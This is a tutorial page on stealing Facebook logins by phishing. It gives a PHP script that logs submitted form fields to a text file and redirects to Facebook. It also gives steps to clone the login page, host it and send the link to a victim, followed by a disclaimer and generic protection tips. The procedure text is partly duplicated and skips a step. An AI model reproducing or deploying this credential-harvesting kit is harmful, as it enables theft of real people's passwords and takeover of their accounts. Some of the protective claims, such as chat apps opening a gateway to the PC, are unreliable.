Hacking Facebook Via Phishing aka Fake Pages
Wikipedia defines Phishing as:- "Phishing is a way of attempting to acquire information such as usernames, passwords, and credit card details by masquerading as a trustworthy entity in an electronic communication." It's still one of the best methods out there for hacking Facebook accounts.In the simplest of all phishing attacks a hacker creates a fake login page which exactly looks like the real Facebook page and then some how makes the victim to login into that page. Once he logins through the fake page the victims "Email Address" and "Password" is stored in to a text file, which could be downloaded by the Hacker.
Procedure
1. Type the following code in Notepad and save "index.php"(without quotes).
2.Open "www.facebook.com" in your browser and save page as "index.html".
"Disclaimer: Hacking is a Cyber Crime.Cyber crimes can involve criminal activities that are traditional in nature, such as theft, fraud, forgery, defamation and mischief, all of which are subject to the Indian Penal Code.Please don't misuse this article!"
Procedure
1. Type the following code in Notepad and save "index.php"(without quotes).
<?php
header ('Location: http://www.facebook.com');
$handle = fopen("log.txt", "a");
foreach($_POST as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>
2.Open "www.facebook.com" in your browser and save page as "index.html".
3.Open the "index.html" file in Notepad.
5. The Phishing page is ready for use now! create an free account to make a website in webhosting sites with php support.Do a Google search and you'll get plenty of them.
6.Upload "index.html" "index.php" and all files of "index_files" folder to your site.
7.Send the URL of the site to your victim and if he logins then a new log.txt file will be created and their password will be saved in that file.You can access that file from the dashboard of your web hosting service provider.
How to protect yourself from phishing
- Use an up-to-date browser that features an anti-phishing black list.
- Use unique logins and passwords for each of the websites you use.
- Check to see that you're logging in from a legitimate Facebook page with the facebook.com domain.
- Be cautious of any message, post or link you find on Facebook that looks suspicious or requires an additional login.
- Allowing Facebook applications like Facebook Chat v2.0, Constitution and many other social applications in Facebook allows the hackers community to make a gateway to enter your PC and to your FB account.
- Facebook do not send you links that do not come from their domain. Even if the link looks safe, don’t trust it.
- If the site has a security update or is wanting more information, chances are after you login they will ask for it. Remember if it seems fishy or not quite right, don’t do it.
- Be sure that you add only known people to your profile and do not allow any random applications to your profile.
- Also change the privacy settings of your FB page so that you allow only your friends to view in your profile.
What If my account was phished...?
One action that you can take is report the fake profile. To report you can just go to the FB page of the fake profile, click on Report/Abuse this profile. You will get a new dialogue box, where you need to check the “Report the person”. You will be asked to mention the reason. In the first place, select “Fake Profile”. Secondly select the “Impersonated profile”, and you also need to post the URL of your original profile .The FB team then should get back to you in next 24 hrs.
Comments
